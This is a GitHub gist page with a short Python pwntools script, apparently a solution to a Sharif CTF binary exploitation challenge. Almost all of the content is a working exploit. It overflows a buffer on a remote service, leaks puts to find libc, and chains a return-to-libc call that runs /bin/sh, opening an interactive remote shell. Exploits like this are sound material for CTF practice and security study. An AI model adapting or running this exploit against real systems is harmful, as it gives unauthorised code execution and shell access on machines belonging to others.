Skip to content

Instantly share code, notes, and snippets.

@CreateRemoteThread

CreateRemoteThread/sharif-pwn1.py

Created February 4, 2018 00:13
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CreateRemoteThread/706baf0bd22ff768bd27b02c2816963b to your computer and use it in GitHub Desktop.
Save CreateRemoteThread/706baf0bd22ff768bd27b02c2816963b to your computer and use it in GitHub Desktop.
Download ZIP
Raw
sharif-pwn1.py
#!/usr/bin/python
import pwn
import struct
OFFSET_HEADSHOT = struct.pack("<L",0x080483A0)
OFFSET_RETN = struct.pack("<L",0x080484EA)
OFFSET_PLT = struct.pack("<L",0x08049874)
OFFSET_ROPBREAK = struct.pack("<L",0x41424344)
p = pwn.remote("ctf.sharif.edu",4801)
# p = pwn.process("./vuln4")
# x = raw_input("Press enter to continue")
p.recv()
p.send("A"*22 + OFFSET_HEADSHOT + OFFSET_RETN + OFFSET_PLT + "\n")
data = p.recv()
OFFSET_PUTS = struct.unpack("<L",data[0:4])[0]
OFFSET_LIBC = OFFSET_PUTS - 0x5FCA0
OFFSET_EXECL = struct.pack("<L",OFFSET_LIBC + 0x3ada0)
OFFSET_BINSH = struct.pack("<L",OFFSET_LIBC + 0x15ba0b)
print "puts at : %x" % OFFSET_PUTS
# print "libc at : %x" % OFFSET_LIBC
p.send("A"*22 + OFFSET_EXECL + OFFSET_BINSH + OFFSET_BINSH + "\n")
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment